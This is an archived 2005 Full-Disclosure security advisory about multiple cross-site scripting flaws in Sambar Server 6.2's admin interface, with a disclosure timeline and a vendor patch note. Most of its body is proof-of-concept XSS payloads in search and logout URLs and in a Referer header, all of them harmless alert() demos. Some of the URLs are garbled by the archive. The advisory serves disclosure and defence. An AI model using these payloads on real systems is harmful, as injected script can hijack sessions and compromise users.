[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] XSS in Sambar Server version 6.2

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] XSS in Sambar Server version 6.2
From: jamie fisher <contact_jamie_fisher@xxxxxxxxxxx>
Date: Mon, 23 May 2005 22:02:29 +0100 (BST)

                     - Sambar - 
AFFECTED PRODUCTS:
================== 
Sambar Server 6.2 
http://www.sambar.com/ 

OVERVIEW: 
=========
Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC, 
Syslog, Proxy and FTP server.

HISTORY:
========
17th April 2005 - First discovered
17th April 2005 - Contacted vendor
20th April 2005 - Vendor reply
20th May 2005 - Patch available

DETAILS:
========
Multiple XSS found in the administrative interface.
In some instances Sambar Server version 6.2 does not correctly filter HTML code 
from user-supplied 
input. A user can input a specially crafted script that when rendered by the 
application, will cause arbitrary scripting to be executed by the user's 
browser. The code will originate from the site running the Sambar Server 
version 6.2 software and will run in the security context of that site. 

ISSUE:
======
Crafted input of causes the application to output what is known as a Cross Site 
Script.  The script is rendered upon visitation to the affected the page served 
by the application.
EXAMPLE:
========
Standard XSS within the /search directory:
==========================================
1.
">alert("XSS")&style=fancy&spage=10&query=Folder%name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name
2.
%22%27>&style=fancy&spage=10&query=Folder%name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name
3.
">alert("XSS")&style=fancy&spage=20&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name
4.
%22%27>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name
5.
">alert("XSS")&style=fancy&spage=30&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name
6.
%22%27>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name
7.
">alert("XSS")&style=fancy&spage=40&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name
8.
%22%27>&style=fancy&spage=40&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name
9.
">alert("XSS")&style=fancy&spage=50&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name
10.
%22%27>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name
11.
">alert("XSS")&style=fancy&spage=60&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name
12.
%22%27>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name
Standard XSS within the /session directory:
===========================================
1.
'>alert('XSS')http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script>
2.
">alert("XSS")http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script>
3.
%22%27>http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
HTML XSS within the /search directory:
======================================
1.
"'>&style=fancy&spage=10&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name
2.
"'>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name
3.
"'>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name
4.
"'>http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name
5.
"'>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name
6.
"'>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name
No chevron '<' '>' XSS within the /search directory:
====================================================
1.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name
2.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name
3.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name
Escaping from HTML XSS within the /session directory:
====================================================
1.
alert(%27XSS%27)http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script>
Including XSS within referrer:
==============================
1.
GET /CheckingXssInReferer.html HTTP/1.0
Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; 
RCslb=5; RCrelogin=false
Host: 192.168.0.5
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Referer: "></a><script>alert('XSS')</script>

SOLUTION: 
=========
Sambar Server has been contacted and has released patches. 
Note: There were probably a lot more input validation errors but due to a 
whinning girlfriend work had to be cut short :)

REFERENCE:
==========
http://www.sambar.com/security.htm
http://homepage.hispeed.ch/spamtrap/sambar62p.exe

CREDITS: 
========
Tod Sambar for understanding the issue and resolving in a timely manner.
 
This vulnerability was discovered and researched by Jamie Fisher
mail: contact_jamie_fisher[at]yahoo.co.uk

                
---------------------------------
Yahoo! Messenger NEW - crystal clear PC to PCcalling worldwide with voicemail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] XSS in Sambar Server version 6.2
  - From: Daniel

Prev by Date: [Full-disclosure] [ GLSA 200505-18 ] Net-SNMP: fixproc insecure temporary file creation
Next by Date: Re: [Full-disclosure] RE: Security issue in Microsoft Outlook
Previous by thread: [Full-disclosure] [ GLSA 200505-18 ] Net-SNMP: fixproc insecure temporary file creation
Next by thread: Re: [Full-disclosure] XSS in Sambar Server version 6.2
Index(es):
- Date
- Thread